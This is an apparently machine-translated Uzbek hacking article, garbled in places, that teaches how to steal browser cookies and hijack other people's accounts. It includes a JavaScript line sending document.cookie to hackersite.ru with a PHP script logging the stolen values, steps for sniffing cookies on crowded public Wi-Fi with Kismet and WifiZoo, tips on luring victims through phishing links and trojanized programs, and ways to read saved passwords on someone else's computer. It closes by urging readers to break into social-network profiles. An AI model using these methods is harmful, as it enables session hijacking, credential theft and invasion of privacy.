Metasploit-dan ko'ra ko'proq xakerlik dasturini tasavvur qilish qiyin va bugungi sharhimiz shu bilan yakunlanadi. Metasploit - bu turli xil vositalar to'plami bo'lib, ularning asosiy vazifasi zaifliklardan foydalanishdir dasturiy ta'minot. Tasavvur qiling: pentesterning kundalik hayotida 1000 ga yaqin ishonchli, isbotlangan va kerakli ekspluatatsiyalar - bu sizning smartfoningizda! Bunday vosita yordamida siz haqiqatan ham har qanday tarmoqda o'zingizni o'rnatishingiz mumkin. Metasploit nafaqat server ilovalaridagi kamchiliklardan foydalanishga imkon beradi - mijoz ilovalariga hujum qilish uchun vositalar ham mavjud (masalan, Brauzer Autopwn moduli orqali, mijoz trafigiga jangovar yuk kiritilganda). Bu erda shuni aytish kerak mobil versiyasi Asboblar to'plami yo'q, lekin standart paketni Apple qurilmasiga o'rnatishingiz mumkin.

Cookie nima?

Http serveriga foydalanuvchining kompyuteridagi ba'zi matnli ma'lumotlarni saqlash va undan keyin kirish imkonini beruvchi mexanizm mavjud. Ushbu ma'lumot cookie deb ataladi. Aslida, har bir cookie bir juftlikdir: parametr nomi va uning qiymati. Har bir cookie fayliga u tegishli domen ham tayinlanadi. Xavfsizlik nuqtai nazaridan, barcha brauzerlarda http serveriga faqat o'z domenining cookie-fayllariga kirishga ruxsat beriladi. Bundan tashqari, cookie-fayllar yaroqlilik muddatiga ega bo'lishi mumkin, bu holda ular barcha brauzer oynalarini yopsangiz ham, shu sanagacha kompyuterda saqlanadi.


Cookie-fayllar nima uchun muhim?

Barcha ko'p foydalanuvchi tizimlari foydalanuvchini aniqlash uchun cookie-fayllardan foydalanadi. Aniqrog'i, foydalanuvchining xizmatga joriy ulanishi, foydalanuvchi sessiyasi. Agar kimdir cookie-fayllaringizni tanisa, u sizning nomingizdan tizimga kirishi mumkin bo'ladi. Chunki ichida hozirda juda oz sonli Internet resurslari bitta foydalanuvchi seansi davomida IP-manzil o'zgarishlarini tekshiradi.


Cookie-fayllarni qanday o'zgartirish yoki almashtirish kerak?

Brauzer ishlab chiquvchilari cookie-fayllarni tahrirlash uchun o'rnatilgan vositalarni taqdim etmaydi. Ammo siz oddiy bloknot bilan o'tishingiz mumkin.


1-qadam: matnli matnli fayl yarating

Windows ro'yxatga olish kitobi muharriri 5.00 versiyasi



@="C:\\IE_ext.htm"

Uni IE_ext.reg nomi ostida saqlang

2-qadam: Yaratilgan fayldan foydalanib, Windows ro'yxatga olish kitobiga o'zgartirishlar qo'shing.

3-qadam: matnli matnli fayl yarating

< script til = "javascript">
external.menuArguments.clipboardData.setData("Matn" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
ogohlantirish (external.menuArguments.document.cookie);


Uni C:\IE_ext.htm nomi ostida saqlang

4-qadam: Bizni qiziqtirgan veb-saytga o'tamiz.

5-qadam: Sahifaning bo'sh joyini o'ng tugmasini bosing va menyu bandini tanlang "Cookie-fayllar bilan ishlash". Buferga kirishga ruxsat bering. Ushbu saytdagi cookie-fayllaringiz vaqtinchalik xotiraga o'tadi. Siz ularning bloknotini qo'yishingiz va ko'rishingiz mumkin.


6-qadam: Ba'zi cookie-fayllarni o'zgartirish uchun C:\IE_ext.htm faylini almashtiring test nomi kuki nomi bilan, sinov qiymati- uning ma'nosi haqida, testdomain.ru- sayt domeniga. Agar kerak bo'lsa, shunga o'xshash qatorlarni qo'shing. Boshqarish qulayligi uchun men skriptga o'zgartirishdan oldin va keyin joriy cookie-fayllarning chiqishini qo'shdim: ogohlantirish (external.menuArguments.document.cookie);

7-qadam: 5-bosqichni yana bajaring va keyin sahifani yangilang.

Xulosa: biz ushbu Internet-resursga yangilangan cookie-fayllar bilan kiramiz.

JavaScript yordamida cookie-fayllarni qanday o'g'irlash mumkin?

Agar tajovuzkor jabrlanuvchining kompyuterida o'zboshimchalik bilan JavaScript skriptini bajarish imkoniyatini topsa, u joriy cookie-fayllarni juda oson o'qiy oladi. Misol:


var str= document.cookie;

Ammo u ularni o'z saytiga o'tkaza oladimi, chunki yuqorida aytib o'tganimdek, JavaScript skripti boshqa domenda joylashgan saytga qo'shimcha tasdiqsiz kira olmaydi? Aniqlanishicha, JavaScript skripti istalgan http serverida joylashgan istalgan tasvirni yuklay oladi. Shu bilan birga, yuklab olish so'rovidagi har qanday matn ma'lumotlarini ushbu rasmga o'tkazing. Misol: http://hackersite.ru/xss.jpg?text_info Shunday qilib, agar siz ushbu kodni ishlatsangiz:

var img= yangi rasm();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


keyin cookie "rasm" ni yuklab olish so'rovida tugaydi va tajovuzkorga "ketadi".

"Rasm" ni yuklab olish uchun bunday so'rovlarni qanday hal qilish kerak?

Buzg'unchi faqat PHP-ni qo'llab-quvvatlaydigan hostingni topishi va u erda quyidagi kodni joylashtirishi kerak:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt", "a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Keyin ushbu skript uchun barcha so'rov parametrlari faylda saqlanadi log.txt. Oldin tasvirlangan JavaScript skriptini almashtirish qoladi http://hackersite.ru/xss.jpg ushbu PHP skriptiga boradigan yo'lga.


Pastki chiziq

Men XSS zaifliklaridan foydalanishning eng oddiy usulini ko'rsatdim. Ammo bu shuni ko'rsatadiki, ko'p foydalanuvchili Internet saytida kamida bitta bunday zaiflik mavjudligi tajovuzkorga o'z resurslaridan sizning nomingizdan foydalanishga imkon berishi mumkin.

Salom, bu qisqa maqola, aksincha qisqa Tasvir Men o'zimni bag'ishlashni xohlayman oddiy yo'l cookie-fayllarni to'xtating wi-fi tarmoqlari. Men bu erda sizga cookie fayllari nima ekanligini va nima uchun kerakligini aytmayman, agar odam "pishirilgan mahsulotlar" ni ushlab qolishdan manfaatdor bo'lsa; simsiz tarmoqda, menimcha, u nima ekanligini va nima uchun kerakligini bilishi kerak. Men faqat bir narsani aytaman: ushbu fayllardan foydalanib, foydalanuvchilardan autentifikatsiya jarayonidan o'tishni talab qiladigan turli saytlardagi boshqa odamlarning hisoblariga kirishingiz mumkin (masalan, mail.ru, vkontakte.ru va boshqalar).

Shunday qilib, keling, boshlaylik. Birinchidan, biz simsiz tarmoqning o'zini, ochiq Internetga kirish shlyuzini topishimiz kerak va bu tarmoq juda ko'p mijozlarga ega bo'lishi maqsadga muvofiqdir. Masalan, yirik savdo markazlari, aeroportlar, turli xil qahvaxonalardagi har qanday tarmoq mos keladi, bunday joylarda odamlar odatda foydalanadilar wi-fi kirish Internetda, pochtani o'qish, turli tanishuv saytlarida hisoblarni tekshirish, LJ va turli forumlarni ko'rish uchun. Bularning barchasi bizga kerak bo'lgan narsadir. Tarmoqning joylashishini tanlashga qaror qilib, mijozlarning maksimal sonining ma'lum soatlarini o'rganib, to'g'ridan-to'g'ri jangovar operatsiyalarga o'tamiz. Buning uchun bizga noutbuk kerak wi-fi adapteri, va ma'lum dasturlar to'plami. Mening vaziyatimda men foydalanardim Acer noutbuk Aspire 3610, D-Link DWL G650 mijoz wi-fi kartasi va BackTrack3 OS o'rnatilgan.

Men sizga ushbu OS dan foydalanishni maslahat beraman, chunki u allaqachon sizga kerak bo'lishi mumkin bo'lgan barcha dasturlarni o'z ichiga oladi va eng muhim afzalligi shundaki, siz Backtrack-ni o'rnatishingiz shart emas. qattiq disk, siz ushbu OSni to'g'ridan-to'g'ri CD yoki flesh-diskdan yuklashingiz mumkin.

Endi kerakli dasturiy ta'minotga o'tamiz. Men tarmoqni topish uchun kismet-dan, cookie-fayllarni tutib olish uchun WifiZoo-dan foydalanardim. Men ikkinchi dastur haqida batafsil to'xtalib o'taman. WifiZoo passiv to'lqinli skaner bo'lib, juda ko'p narsalarni to'playdi foydali ma'lumotlar, masalan: pop3, smtp trafiki, http cookie/authinfo, msn, ftp hisob ma'lumotlari, telnet tarmog'i trafigi, nbt va boshqalar. Ushbu dasturning yagona kamchiliklari - bu kanalga o'tish rejimining yo'qligi, WifiZoo shunchaki simsiz interfeysni tinglaydi va ta'bir joiz bo'lsa, kanaldan kanalga o'tolmaydi. Ammo bu kamchilik ushbu rejimni qo'llab-quvvatlaydigan boshqa dastur - Kismet tomonidan qoplanadi. WifiZoo-ni ishga tushirish uchun sizga kerak bo'ladi:

  • piton
  • qo'rqinchli
  • Qismet

Shunday qilib, dasturni ishga tushiramiz, avval kanalga o'tish rejimini qo'llab-quvvatlash uchun Kismet-ni ishga tushiramiz, keyin to'g'ridan-to'g'ri WifiZoo-ni ishga tushiramiz, sizning oldingizda quyidagi oyna paydo bo'lishi kerak:

Endi faqat o'tirib, biror narsani ushlab turguningizcha kutish qoladi; dastur ushlab turgan hamma narsani /logs/ dasturi bilan katalogda joylashgan jurnallarda topish mumkin. 127.0.0.1:8000 da http ga avtomatik ravishda ulanadigan GUI interfeysini ham ishga tushirishingiz mumkin.

Men ushbu ajoyib dasturning barcha xususiyatlari haqida yozmayman, o'ylaymanki, siz boshqa xususiyatlarni o'zingiz aniqlaysiz va hozirgi paytda biz faqat cookie-fayllarga qiziqamiz. Cookie-fayllar yozilgan havolani bosing va biz nima tutganimizni ko'ring:

Cookie fayllarini o'g'irlash usullari

Ushbu xakerlik usuli, cookie-fayllarni o'g'irlash ajoyib ishlaydi va ko'plab xakerlar tomonidan qo'llaniladi. Agar siz ham sinab ko'rmoqchi bo'lsangiz, lekin nima qilishni bilmasangiz, tavsiyalarimizni o'qing.

Cookie fayllari nima?

Bu foydalanuvchining ma'lum bir saytga tashrifi haqidagi ma'lumot. U alohida joyda saqlanadi matnli hujjat. U erda siz turli xil ma'lumotlarni topishingiz mumkin. Jumladan, loginlar, parollar, manzillar pochta qutilari va telefon raqamlari. Shuning uchun o'g'rilar ushbu hujjatlarni qo'llariga olishga intilishadi. Kerakli materiallarni o'g'irlash uchun xakerlar turli usullarga murojaat qilishadi.

Cookie fayllarini o'g'irlash usullari

XSS zaifligi

Uni har qanday veb-saytda topish va ishlatish mumkin. Mutaxassis zaiflikni topgach, unga maxsus kod kiritadi. Maqsadga qarab, kodlar har xil, ular ma'lum bir manba uchun yozilgan. Agar foydalanuvchi ushbu sahifaga tashrif buyursa va uni yangilasa, barcha o'zgarishlar qo'llaniladi. Kod ishlay boshlaydi - u jabrlanuvchining kompyuteriga o'rnatilgan va barchasini to'playdi zarur ma'lumotlar brauzerdan.

Kodni kiritish uchun siz har qanday turdagi zaiflikdan foydalanishingiz mumkin - veb-resursdagi, brauzerdagi yoki kompyuter tizimidagi xato.

XSS hujumlarining 2 turi mavjud:

Passiv - sahifa skriptiga yo'naltirilgan. Bunday holda siz sahifa elementlarida zaifliklarni izlashingiz kerak. Masalan, dialog oynasi, qidiruv oynasi, video katalogi va boshqalar.

Faol - Siz ularni serverda qidirishingiz kerak. Ular, ayniqsa, turli forumlarda, bloglarda va chatlarda tez-tez uchraydi.

Qanday qilib odamni XSS qo'llashga majburlash mumkin?

Vazifa oson emas, chunki ko'pincha kodni faollashtirish uchun siz u bilan havolani bosishingiz kerak. Siz havolani yashirishingiz va uni qiziqarli taklif bilan birga elektron pochta orqali yuborishingiz mumkin. Misol uchun, onlayn-do'konda katta chegirma taklif qiling. Bularning barchasini rasmda ham amalga oshirishingiz mumkin. Foydalanuvchi katta ehtimol bilan uni ko'radi va hech narsadan shubhalanmaydi.

Snifferni o'rnatish

Bu amalga oshirish maxsus dasturlar boshqa birovning qurilmasidagi trafikni kuzatish. Sniffer sizga boshqa odamlarning ma'lumotlari bilan uzatilgan seanslarni ushlab turish imkonini beradi. Shu tarzda siz barcha login va parollarni, manzillarni, istalgan narsalarni olishingiz mumkin muhim ma'lumotlar foydalanuvchi tomonidan tarmoq orqali uzatiladi. Bunday holda, hujumlar ko'pincha himoyalanmagan HTTP ma'lumotlariga amalga oshiriladi. Buning uchun xavfsiz bo'lmagan Wi-Fi yaxshi ishlaydi.

Snifferni amalga oshirishning bir necha yo'li mavjud:

  • Trafikni nusxalash;
  • Trafik hujumlari yordamida ma'lumotlarni tahlil qilish;
  • Interfeyslarni tinglash;
  • Kanal uzilishiga snifferni kiritish.
Cookie fayllarini almashtirish

Barcha ma'lumotlar veb-serverda asl ko'rinishida saqlanadi. Agar siz ularni o'zgartirsangiz, bu almashtirish deb hisoblanadi. Qabul qilingan barcha materiallar boshqa kompyuterda ishlatilishi mumkin. Shunday qilib, siz foydalanuvchining shaxsiy ma'lumotlariga to'liq kirish huquqiga ega bo'lasiz. Brauzer sozlamalari, qo'shimchalar yoki maxsus dasturlar yordamida cookie-fayllarni o'zgartirishingiz mumkin. Tahrirlash kompyuterdagi har qanday standart bloknotda ham mumkin.

Virus yordamida cookie-fayllarni o'g'irlash

Mutaxassislar, agar bunga alohida ehtiyoj bo'lmasa, cookie-fayllardan foydalanmaslikni maslahat berishadi. Agar ularni o'chirish mumkin bo'lsa, buni qilish yaxshiroqdir. Buning sababi, cookie fayllari juda himoyasiz. Ular ko'pincha jinoyatchilar tomonidan o'g'irlanadi. Ushbu fayllardan katta miqdordagi shaxsiy ma'lumotlarni olish mumkin. maxfiy ma'lumotlar, bu shaxsga qarshi ishlatiladi. Seans tugagandan so'ng tizimda qoladigan fayllarning eng xavfli turi.

Cookie-fayllar ko'pincha virus yordam dasturi yordamida o'g'irlanadi. Bu juda oddiy tarzda amalga oshiriladi. Har qanday xavfsiz yordamchi dastur kompyuterda ma'lum materiallarni to'playdigan virus bilan o'rnatilgan. Virus dasturi o'z egasining serveriga ulanadi. Dastur brauzer uni proksi-server sifatida ishlatishi uchun sozlanishi kerak.

Dastur jabrlanuvchining shaxsiy kompyuteriga etib kelganida, u avtomatik ravishda barcha saqlangan ma'lumotlarni yig'ishni va sizga yuborishni boshlaydi.

Viruslar har xil, ularning vazifalari ham farq qilishi mumkin. Ba'zilar brauzerni to'liq nazorat qilish va har qanday ma'lumotni ko'rish imkonini beradi. Boshqalar himoyalangan materiallarni o'g'irlashga qodir. Boshqalar esa faqat himoyalanmagan ma'lumotlarni yig'adilar.

Siz boshqa birovning kompyuteriga virus dasturini kiritishda qiynalishingiz mumkin. Uni yuklab olish va ishga tushirish uchun foydalanuvchini majburlash kerak. Bu erda siz unga dasturga havola bilan xat yuborishingiz yoki dasturni xavfsiz deb o'chirib tashlashingiz va odam uni veb-saytingizdan yuklab olishini kutishingiz mumkin.

Cookie-fayllarni o'g'irlikdan qanday himoya qilish kerak?

Aksariyat veb-resurslar yetarli darajada himoyalanmagan. Xakerlar ushbu platformalardagi zaifliklar va xatolarni osongina topadilar.

Cookie-fayllarni himoya qilish qoidalari:

  1. Kompyuter identifikatorini joriy seansga ulang. Keyin, uchinchi tomon qurilmasidan saytga kirganingizda, yangi seans boshlanadi va avvalgisidan ma'lumotlar olinmaydi.
  2. Seansni brauzer bilan bog'lang. Xuddi shu printsip avvalgi xatboshida bo'lgani kabi ishlaydi.
  3. Tarmoq orqali yuborilgan parametrlarni shifrlash. Keyin hujjatda saqlangan ma'lumotlar tushunarli bo'lmaydi. Uni ushlab olgan kishi uchun bu foydasiz bo'ladi. Ushbu usul sizni 100% himoya qilmaydi, ba'zi mutaxassislar har qanday materialning shifrini ochishi mumkin.
  4. Identifikatorlar uchun alohida papka yarating.

Cookie-fayllar orqali boshqa birovning hisob parolini qanday topish mumkin?

Birovning kirish ma'lumotlarini olish uchun avval u saqlangan faylga kirishingiz kerak.

Foydalanadiganlar uchun Mozilla Firefox asosiy menyuda joylashgan asboblar yorlig'iga o'tishingiz kerak. Keyingi tizim sozlamalarida siz "Himoya" bo'limini topasiz, u erda siz ijtimoiy tarmoqlardagi hisoblar haqidagi barcha muhim ma'lumotlarni qidirishingiz kerak. Barcha parollar yashirin, shuning uchun "ko'rsatish" tugmasini bosing. Siz darhol himoyani o'rnatishingiz va maxsus kodni qo'yishingiz mumkin. Shunda sizdan boshqa hech kim bu ma'lumotni olmaydi.

Operada faqat foydalanuvchi nomlari ommaga ko'rish uchun mavjud. Lekin menyuda siz parol menejerini topishingiz va kompyuteringizda saqlangan hamma narsani ko'rishingiz mumkin. To'liq ro'yxat boshqaruvchida. Parollarga kirish uchun siz qo'shimcha kengaytmani o'rnatishingiz kerak.

IN Gugl xrom Ushbu materiallarning barchasini kengaytirilgan sozlamalarda ko'rish mumkin. Barcha saqlangan cookie-fayllar bilan yorliq mavjud.

Afsuski, standart brauzer Internet Explorer bunday funktsiyalarga ega emas. Shaxsiy kompyuter egasi tashrif buyuradigan veb-platformalar haqida ma'lumot olish uchun siz maxsus dasturni yuklab olishingiz kerak. Siz uni Internetda bepul topishingiz mumkin, u butunlay xavfsiz, lekin uni ishonchli manbalardan yuklab olish yaxshiroqdir. Shuni unutmangki, har qanday dastur antivirus tomonidan skanerdan o'tkazilishi kerak. Bu, ayniqsa, parollar bilan ishlaydigan yordamchi dasturlar uchun to'g'ri keladi.

Ushbu texnika faqat ega bo'lganlar uchun javob beradi jismoniy kirish jabrlanuvchining kompyuteriga. Agar shaxs sizning shaxsiy kompyuteringiz orqali platformaga kirgan va o'z ma'lumotlarini saqlagan bo'lsa, siz boshqa birovning parolini ham bilib olishingiz mumkin.

Cookie fayllarni o'g'irlash uchun dasturlar

Internetda xakerlar bir-biri bilan muloqot qiladigan ko'plab xaker forumlari mavjud. Odamlar u yerga bepul yordam olish umidida borishadi. U erda siz xakerlik uchun juda ko'p turli xil dasturlarni topishingiz mumkin. Sizni ogohlantirmoqchimizki, bu dasturlarga ishonmaslik kerak. Boshqa birovning qurilmasidan cookie-fayllarni masofadan o'g'irlash uchun yordamchi dasturlar dummies yoki virus dasturlari. Agar siz ushbu dasturni shaxsiy kompyuteringizga yuklab qo'ysangiz, firibgarning tuzog'iga tushib qolasiz. Scammers dasturlarni bepul joylashtiradi. Shunday qilib, ular virusli dasturlarni tarqatadilar va boshqa odamlarning shaxsiy kompyuterlari ustidan nazoratni qo'lga kiritadilar. Umuman olganda, bunday dasturlar firibgarlikdir, siz buni interfeysi va mazmuni bilan tushunasiz. Agar siz fayllarni chiqarib olish uchun biron bir dasturdan foydalanmoqchi bo'lsangiz, u holda sniffers bo'lsin. Albatta, ulardan foydalanish unchalik oson emas. Internetda yaxshi snifferni topish oson emas. Ammo bunday dasturiy ta'minotni sizga pul uchun sotishi mumkin bo'lgan mutaxassislardan olish mumkin. Esingizda bo'lsin, ko'plab firibgarlar bor, ularning har biri o'z hiylalariga ega. Siz faqat yaxshi obro'ga ega, sharhlarga ega va o'z veb-saytiga ega ishonchli xakerlarga ishonishingiz kerak.

Xulosa qilib shuni ta'kidlashni istardimki, kukilarni o'g'irlash haqiqatan ham kuchli usul bo'lib, uning samaradorligi juda yuqori. Agar siz ijtimoiy tarmoq yoki messenjerda kimningdir profilini buzib kirmoqchi bo'lsangiz, ushbu variantni ko'rib chiqing. Bu usul jabrlanuvchining kompyuteridan foydalana olsangiz yaxshi ishlaydi. Materiallarni masofadan turib olish ancha qiyin, ammo siz bizning maslahatlarimizdan foydalanishingiz va ushbu usulni amalda qo'llashga harakat qilishingiz mumkin.

Bobda



 


O'qing:



Eng yaxshi simsiz minigarnituralar reytingi

Eng yaxshi simsiz minigarnituralar reytingi

Universal quloqlarni arzon sotib olish mumkinmi? 3000 rubl - bunday pulga yuqori sifatli eshitish vositalarini sotib olish mumkinmi? Ma'lum bo'lishicha, ha. Va nutq ...

Mobil qurilmaning asosiy kamerasi odatda tananing orqa tomonida joylashgan bo'lib, fotosuratlar va videolarni olish uchun ishlatiladi

Mobil qurilmaning asosiy kamerasi odatda tananing orqa tomonida joylashgan bo'lib, fotosuratlar va videolarni olish uchun ishlatiladi

Yaxshilangan xarakteristikalar va yuqori avtonomiyaga ega planshetning yangilangan versiyasi.Acer smartfonlariga kamdan-kam tashrif buyuradi...

Raqamingizni saqlab qolgan holda boshqa operatorga qanday o'tish mumkin

Raqamingizni saqlab qolgan holda boshqa operatorga qanday o'tish mumkin

Rossiyada 1 dekabrdan boshlab abonent boshqa uyali aloqa operatoriga o‘tganda telefon raqamini saqlab qolish to‘g‘risidagi qonun kuchga kirdi. Biroq, ma'lum bo'lishicha, ...

phabletni ko'rib chiqish, qimmat, lekin juda malakali

phabletni ko'rib chiqish, qimmat, lekin juda malakali

Qimmatbaho, lekin juda malakali fablet sharhi 20.03.2015 Men dunyodagi etiksiz yagona poyabzalchiman, o'z smartfonimsiz smartfon sharhlovchisiman....

tasma tasviri RSS